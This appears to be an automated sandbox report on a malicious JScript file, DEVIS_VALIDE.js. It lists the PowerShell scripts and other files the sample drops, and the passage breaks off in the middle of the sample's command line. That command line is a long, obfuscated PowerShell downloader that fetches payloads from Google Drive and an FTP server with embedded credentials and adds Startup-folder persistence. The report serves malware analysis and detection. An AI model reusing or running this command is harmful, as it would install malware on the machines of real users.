IOC Report
DEVIS_VALIDE.js

loading gif

Files

File Path
Type
Category
Malicious
DEVIS_VALIDE.js
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
 malicious
C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\ainzw.ps1
ASCII text, with very long lines (431), with no line terminators
dropped
 malicious
C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\iyvmd.ps1
ASCII text, with very long lines (426), with no line terminators
dropped
 malicious
C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1
Unicode text, UTF-16, little-endian text, with very long lines (29340)
dropped
 malicious
C:\Users\user\AppData\Local\Temp\dll03.ps1
Unicode text, UTF-16, little-endian text, with very long lines (404), with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Roaming\pesister.ps1
ASCII text, with CRLF line terminators
dropped
 malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\Log.tmp
ASCII text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00rntceo.jrr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_05uwrxvg.w11.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lppsh3d.deg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0lyzkmkb.szk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0vm2u2tj.cld.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_11mrdqxk.snb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ldwhjyp.2hg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20v3rimq.c5a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2j3qjly1.41y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xddsc2a.j50.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fgwcyo4.4oo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5b0vrqp2.bca.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5o2hlpce.ati.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ur3z0rt.xb1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acn3wbo0.i5m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b2g2j45w.xxw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bjgfqbmy.m2j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cxsk1tx4.btl.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eoa3l1pr.1vk.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_exaltd5h.xup.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fvz5va2c.nhw.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gukqg5gr.qfz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h0lnb325.zyr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht1ibnhl.e4p.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idgzrvnx.jts.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kta5vpsx.uem.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kuqjuwew.2jg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0pzfubd.i1n.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsek3wem.ak5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lturyukq.pug.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lyhdttgd.2qj.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5xbv0m3.4rv.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ns2vmmic.p1y.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nvdrnf1h.vvi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nyqtqhx0.4az.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0r04yog.bvg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r51ffmnn.zia.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rh5nvktm.m32.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rictrcb3.pp3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rioo30nu.ee2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjtgquhe.i43.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s0kp5oum.5ll.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sa42wup1.rzr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_si3vjuii.kq2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_smqvn0us.siy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tlygr34y.apg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ttumwows.bqh.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ughuyvv5.tow.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uwnhn31m.3kn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voxydeal.pko.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzolyk42.onb.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wbnytsue.e1k.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xnw4aznd.0ma.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xprgebig.2e3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ysqluzhw.kng.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z0zsqjnc.3xp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1fl3emf.nzk.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1li41dk.iwt.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zaxvgb0c.i2y.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zdurlvy1.4u3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zeuktaff.44w.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zpnlwdsy.gfs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\dll01.txt
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\dll02.txt
Unicode text, UTF-16, little-endian text, with very long lines (29774), with CRLF line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4NZTABXLFAAOWOCT1TTK.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5001ef.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF502277.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF5046c8.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF50777c.TMP (copy)
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5WFGP9N1ACZHGBAGAM3Q.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\N76D6OTIB6TYA3HBKUF1.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PNZ9H66UCS265X294YE1.temp
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WM47U45LH6O15P7H61NT.temp
data
dropped
There are 74 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DEVIS_VALIDE.js"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = 'JA' + [char]66 + '2AHgAYg' + [char]66 + 'DAHgAIAA9ACAAJA' + [char]66 + 'oAG8Acw' + [char]66 + '0AC4AVg' + [char]66 + 'lAHIAcw' + [char]66 + 'pAG8AbgAuAE0AYQ' + [char]66 + 'qAG8AcgAuAEUAcQ' + [char]66 + '1AGEAbA' + [char]66 + 'zACgAMgApADsASQ' + [char]66 + 'mACAAKAAgACQAdg' + [char]66 + '4AGIAQw' + [char]66 + '4ACAAKQAgAHsAJA' + [char]66 + 'IAHoATw' + [char]66 + 'NAGoAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQA7AGQAZQ' + [char]66 + 'sACAAKAAkAEgAeg' + [char]66 + 'PAE0AagAgACsAIAAnAFwAVQ' + [char]66 + 'wAHcAaQ' + [char]66 + 'uAC4AbQ' + [char]66 + 'zAHUAJwApADsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAJw' + [char]66 + 'oAHQAdA' + [char]66 + 'wAHMAOgAvAC8AZA' + [char]66 + 'yAGkAdg' + [char]66 + 'lAC4AZw' + [char]66 + 'vAG8AZw' + [char]66 + 'sAGUALg' + [char]66 + 'jAG8AbQAvAHUAYwA/AGUAeA' + [char]66 + 'wAG8Acg' + [char]66 + '0AD0AZA' + [char]66 + 'vAHcAbg' + [char]66 + 'sAG8AYQ' + [char]66 + 'kACYAaQ' + [char]66 + 'kAD0AJwA7ACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAPQAgACQAZQ' + [char]66 + 'uAHYAOg' + [char]66 + 'QAFIATw' + [char]66 + 'DAEUAUw' + [char]66 + 'TAE8AUg' + [char]66 + 'fAEEAUg' + [char]66 + 'DAEgASQ' + [char]66 + 'UAEUAQw' + [char]66 + 'UAFUAUg' + [char]66 + 'FAC4AQw' + [char]66 + 'vAG4AdA' + [char]66 + 'hAGkAbg' + [char]66 + 'zACgAJwA2ADQAJwApADsAaQ' + [char]66 + 'mACAAKAAgACQAUA' + [char]66 + 'pAFUAUQ' + [char]66 + 'iACAAKQAgAHsAJA' + [char]66 + 'qAGsAdw' + [char]66 + 'qAHoAIAA9ACAAKAAkAGoAaw' + [char]66 + '3AGoAegAgACsAIAAnADEAcAAyAGIAcg' + [char]66 + 'qAEgALQ' + [char]66 + 'RAE4AWQA1AGIAcg' + [char]66 + '3AGkATA' + [char]66 + 'aAHUAWQ' + [char]66 + 'zAFcALQ' + [char]66 + 'SADUAOQ' + [char]66 + 'VAHcAag' + [char]66 + 'kAFMARQ' + [char]66 + 'WACcAKQAgADsAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAewAkAGoAaw' + [char]66 + '3AGoAegAgAD0AIAAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACAAKwAgACcAMQ' + [char]66 + 'hAGEASA' + [char]66 + '5ADQALQ' + [char]66 + 'CAEwAMQ' + [char]66 + 'qAHAAQQ' + [char]66 + 'uAGoAaA' + [char]66 + '0AGUAZwA4ADgASw' + [char]66 + 'NAFoANw' + [char]66 + 'jAHUAOAAxAFoAMAA1AHcAJwApACAAOw' + [char]66 + '9ADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQAIAA9ACAAKAAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'OAGUAdAAuAFcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAKQAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'jAHgAcA' + [char]66 + 'mAGQALg' + [char]66 + 'EAG8Adw' + [char]66 + 'uAGwAbw' + [char]66 + 'hAGQARg' + [char]66 + 'pAGwAZQAoACQAag' + [char]66 + 'rAHcAag' + [char]66 + '6ACwAIAAoACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACkAIAApACAAOwAkAHQAcA' + [char]66 + 'XAGsARgAgAD0AIAAoACAAJw' + [char]66 + 'DADoAXA' + [char]66 + 'VAHMAZQ' + [char]66 + 'yAHMAXAAnACAAKwAgAFsARQ' + [char]66 + 'uAHYAaQ' + [char]66 + 'yAG8Abg' + [char]66 + 'tAGUAbg' + [char]66 + '0AF0AOgA6AFUAcw' + [char]66 + 'lAHIATg' + [char]66 + 'hAG0AZQAgACkAOw' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAA9ACAAKAAgACQASA' + [char]66 + '6AE8ATQ' + [char]66 + 'qACAAKwAgACcAXA' + [char]66 + 'VAHAAdw' + [char]66 + 'pAG4ALg' + [char]66 + 'tAHMAdQAnACAAKQAgADsAIA' + [char]66 + 'wAG8Adw' + [char]66 + 'lAHIAcw' + [char]66 + 'oAGUAbA' + [char]66 + 'sAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + '3AHUAcw' + [char]66 + 'hAC4AZQ' + [char]66 + '4AGUAIA' + [char]66 + 'IAGgAWA' + [char]66 + 'IAEIAIAAvAHEAdQ' + [char]66 + 'pAGUAdAAgAC8Abg' + [char]66 + 'vAHIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQAIAA7ACAAQw' + [char]66 + 'vAHAAeQAtAEkAdA' + [char]66 + 'lAG0AIAAnACUARA' + [char]66 + 'DAFAASg' + [char]66 + 'VACUAJwAgAC0ARA' + [char]66 + 'lAHMAdA' + [char]66 + 'pAG4AYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uACAAKAAgACQAdA' + [char]66 + 'wAFcAaw' + [char]66 + 'GACAAKwAgACcAXA' + [char]66 + '' + [char]66 + 'AHAAcA' + [char]66 + 'EAGEAdA' + [char]66 + 'hAFwAUg' + [char]66 + 'vAGEAbQ' + [char]66 + 'pAG4AZw' + [char]66 + 'cAE0AaQ' + [char]66 + 'jAHIAbw' + [char]66 + 'zAG8AZg' + [char]66 + '0AFwAVw' + [char]66 + 'pAG4AZA' + [char]66 + 'vAHcAcw' + [char]66 + 'cAFMAdA' + [char]66 + 'hAHIAdAAgAE0AZQ' + [char]66 + 'uAHUAXA' + [char]66 + 'QAHIAbw' + [char]66 + 'nAHIAYQ' + [char]66 + 'tAHMAXA' + [char]66 + 'TAHQAYQ' + [char]66 + 'yAHQAdQ' + [char]66 + 'wACcAIAApACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7AHAAbw' + [char]66 + '3AGUAcg' + [char]66 + 'zAGgAZQ' + [char]66 + 'sAGwALg' + [char]66 + 'lAHgAZQAgAC0AYw' + [char]66 + 'vAG0AbQ' + [char]66 + 'hAG4AZAAgACcAcw' + [char]66 + 'sAGUAZQ' + [char]66 + 'wACAAMQA4ADAAJwA7ACAAcw' + [char]66 + 'oAHUAdA' + [char]66 + 'kAG8Adw' + [char]66 + 'uAC4AZQ' + [char]66 + '4AGUAIAAvAHIAIAAvAHQAIAAwACAALw' + [char]66 + 'mACAAfQ' + [char]66 + 'lAGwAcw' + [char]66 + 'lACAAew' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'yAHYAZQ' + [char]66 + 'yAEMAZQ' + [char]66 + 'yAHQAaQ' + [char]66 + 'mAGkAYw' + [char]66 + 'hAHQAZQ' + [char]66 + 'WAGEAbA' + [char]66 + 'pAGQAYQ' + [char]66 + '0AGkAbw' + [char]66 + 'uAEMAYQ' + [char]66 + 'sAGwAYg' + [char]66 + 'hAGMAawAgAD0AIA' + [char]66 + '7ACQAdA' + [char]66 + 'yAHUAZQ' + [char]66 + '9ACAAOw' + [char]66 + 'bAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'TAGUAcg' + [char]66 + '2AGkAYw' + [char]66 + 'lAFAAbw' + [char]66 + 'pAG4AdA' + [char]66 + 'NAGEAbg' + [char]66 + 'hAGcAZQ' + [char]66 + 'yAF0AOgA6AFMAZQ' + [char]66 + 'jAHUAcg' + [char]66 + 'pAHQAeQ' + [char]66 + 'QAHIAbw' + [char]66 + '0AG8AYw' + [char]66 + 'vAGwAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AUw' + [char]66 + 'lAGMAdQ' + [char]66 + 'yAGkAdA' + [char]66 + '5AFAAcg' + [char]66 + 'vAHQAbw' + [char]66 + 'jAG8AbA' + [char]66 + 'UAHkAcA' + [char]66 + 'lAF0AOgA6AFQAbA' + [char]66 + 'zADEAMgAgADsAaQ' + [char]66 + 'mACgAKA' + [char]66 + 'nAGUAdAAtAHAAcg' + [char]66 + 'vAGMAZQ' + [char]66 + 'zAHMAIAAnAFcAaQ' + [char]66 + 'yAGUAcw' + [char]66 + 'oAGEAcg' + [char]66 + 'rACcALAAnAGEAcA' + [char]66 + 'hAHQAZQ' + [char]66 + 'EAE4AUwAnACwAJw' + [char]66 + 'hAG4AYQ' + [char]66 + 'sAHkAeg' + [char]66 + 'lACcAIAAtAGUAYQAgAFMAaQ' + [char]66 + 'sAGUAbg' + [char]66 + '0AGwAeQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGkAbg' + [char]66 + '1AGUAKQAgAC0AZQ' + [char]66 + 'xACAAJA' + [char]66 + 'OAHUAbA' + [char]66 + 'sACkAewAgAA0ACgAgACAAIAAgACAAIAAgAA0ACg' + [char]66 + '9AA0ACgANAAoAZQ' + [char]66 + 'sAHMAZQ' + [char]66 + '7ACAADQAKAFIAZQ' + [char]66 + 'zAHQAYQ' + [char]66 + 'yAHQALQ' + [char]66 + 'DAG8AbQ' + [char]66 + 'wAHUAdA' + [char]66 + 'lAHIAIAAtAGYAbw' + [char]66 + 'yAGMAZQAgADsADQAKACAAIAAgACAAIAAgAGUAeA' + [char]66 + 'pAHQAIAA7AA0ACgAgAH0AIAA7ACQAag' + [char]66 + 'sAGMAcQ' + [char]66 + 'qACAAPQAgACgAJw' + [char]66 + 'mAHQAcAA6AC8ALw' + [char]66 + 'kAGUAcw' + [char]66 + 'jAGsAdg' + [char]66 + 'iAHIAYQ' + [char]66 + '0ADEAQA' + [char]66 + 'mAHQAcAAuAGQAZQ' + [char]66 + 'zAGMAaw' + [char]66 + '2AGIAcg' + [char]66 + 'hAHQALg' + [char]66 + 'jAG8AbQAuAGIAcgAvAFUAcA' + [char]66 + 'jAHIAeQ' + [char]66 + 'wAHQAZQ' + [char]66 + 'yACcAIAArACAAJwAvADAAMgAvAEQATA' + [char]66 + 'MADAAMQAuAHQAeA' + [char]66 + '0ACcAIAApADsAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAA9ACAAKAAgAFsAUw' + [char]66 + '5AHMAdA' + [char]66 + 'lAG0ALg' + [char]66 + 'JAE8ALg' + [char]66 + 'QAGEAdA' + [char]66 + 'oAF0AOgA6AEcAZQ' + [char]66 + '0AFQAZQ' + [char]66 + 'tAHAAUA' + [char]66 + 'hAHQAaAAoACkAIAArACAAJw' + [char]66 + 'kAGwAbAAwADEALg' + [char]66 + '0AHgAdAAnACkAOwAkAE8Aag' + [char]66 + 'yAFIAUAAgAD0AIAAoAC0Aag' + [char]66 + 'vAGkAbgAgAFsAYw' + [char]66 + 'oAGEAcg' + [char]66 + 'bAF0AXQAoADEAMAAwACwAMQAwADEALAAxADEANQAsADkAOQAsADEAMAA3ACwAMQAxADgALAA5ADgALAAxADEANAAsADkANwAsADEAMQA2ACwANAA5ACkAKQAgADsAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAIAA9ACAAKAAtAGoAbw' + [char]66 + 'pAG4AIA' + [char]66 + 'bAGMAaA' + [char]66 + 'hAHIAWw' + [char]66 + 'dAF0AKAAxADAAMgAsACAAOAA5ACwAIAAxADEANwAsACAAMQAwADAALAAgADgAOQAsACAANAA5ACwAIAA1ADMALAAgADUANQAsACAANQA2ACwAIAA2ADQALAAgADYANAAsACAANgA0ACwAIAA2ADQALAAgADYANAAsACAANgA0ACAAKQApACAAOwAkAHcAZQ' + [char]66 + 'iAEMAbA' + [char]66 + 'pAGUAbg' + [char]66 + '0ACAAPQAgAE4AZQ' + [char]66 + '3AC0ATw' + [char]66 + 'iAGoAZQ' + [char]66 + 'jAHQAIA' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAE4AZQ' + [char]66 + '0AC4AVw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQAIAA7ACQAdw' + [char]66 + 'lAGIAQw' + [char]66 + 'sAGkAZQ' + [char]66 + 'uAHQALg' + [char]66 + 'DAHIAZQ' + [char]66 + 'kAGUAbg' + [char]66 + '0AGkAYQ' + [char]66 + 'sAHMAIAA9ACAAbg' + [char]66 + 'lAHcALQ' + [char]66 + 'vAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'OAGUAdA' + [char]66 + '3AG8Acg' + [char]66 + 'rAEMAcg' + [char]66 + 'lAGQAZQ' + [char]66 + 'uAHQAaQ' + [char]66 + 'hAGwAKAAkAE8Aag' + [char]66 + 'yAFIAUAAsACAAJA' + [char]66 + 'sAGwAbA' + [char]66 + 'HAHEAKQAgADsAJA' + [char]66 + 'SAFYAVQ' + [char]66 + 'YAHYAIAA9ACAAJA' + [char]66 + '3AGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'qAGwAYw' + [char]66 + 'xAGoAIAApACAAOwAkAFIAVg' + [char]66 + 'VAFgAdgAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQASQ' + [char]66 + 'lAHAARw' + [char]66 + 'RACAALQ' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAAnAFUAVA' + [char]66 + 'GADgAJwAgAC0AZg' + [char]66 + 'vAHIAYw' + [char]66 + 'lACAAOwAkAFMAVA' + [char]66 + 'mAEcAbAAgAD0AIAAoACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAEkATwAuAFAAYQ' + [char]66 + '0AGgAXQA6ADoARw' + [char]66 + 'lAHQAVA' + [char]66 + 'lAG0AcA' + [char]66 + 'QAGEAdA' + [char]66 + 'oACgAKQAgACsAIAAnAGQAbA' + [char]66 + 'sADAAMgAuAHQAeA' + [char]66 + '0ACcAKQAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4AIAA9ACAATg' + [char]66 + 'lAHcALQ' + [char]66 + 'PAGIAag' + [char]66 + 'lAGMAdAAgAFMAeQ' + [char]66 + 'zAHQAZQ' + [char]66 + 'tAC4ATg' + [char]66 + 'lAHQALg' + [char]66 + 'XAGUAYg' + [char]66 + 'DAGwAaQ' + [char]66 + 'lAG4AdAAgADsAJA' + [char]66 + 'QAGgAcg' + [char]66 + 'sAE4ALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAIAA9ACAAWw' + [char]66 + 'TAHkAcw' + [char]66 + '0AGUAbQAuAFQAZQ' + [char]66 + '4AHQALg' + [char]66 + 'FAG4AYw' + [char]66 + 'vAGQAaQ' + [char]66 + 'uAGcAXQA6ADoAVQ' + [char]66 + 'UAEYAOAAgADsAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAAgAD0AIAAoACAARw' + [char]66 + 'lAHQALQ' + [char]66 + 'DAG8Abg' + [char]66 + '0AGUAbg' + [char]66 + '0ACAALQ' + [char]66 + 'QAGEAdA' + [char]66 + 'oACAAJA' + [char]66 + 'JAGUAcA' + [char]66 + 'HAFEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAD0AIAAkAFAAaA' + [char]66 + 'yAGwATgAuAEQAbw' + [char]66 + '3AG4AbA' + [char]66 + 'vAGEAZA' + [char]66 + 'TAHQAcg' + [char]66 + 'pAG4AZwAoACAAJA' + [char]66 + 'EAEgAeg' + [char]66 + 'VAEEAIAApACAAOwAkAHUAVA' + [char]66 + 'sAEgAegAgAHwAIA' + [char]66 + 'PAHUAdAAtAEYAaQ' + [char]66 + 'sAGUAIAAtAEYAaQ' + [char]66 + 'sAGUAUA' + [char]66 + 'hAHQAaAAgACQAUw' + [char]66 + 'UAGYARw' + [char]66 + 'sACAALQ' + [char]66 + 'mAG8Acg' + [char]66 + 'jAGUAIAA7ACQATQ' + [char]66 + 'PAEQAUg' + [char]66 + 'nACAAPQAgACcAJA' + [char]66 + 'yAHkAYQ' + [char]66 + 'lAEcAIAA9ACAAKA' + [char]66 + 'HAGUAdAAtAEMAbw' + [char]66 + 'uAHQAZQ' + [char]66 + 'uAHQAIAAtAFAAYQ' + [char]66 + 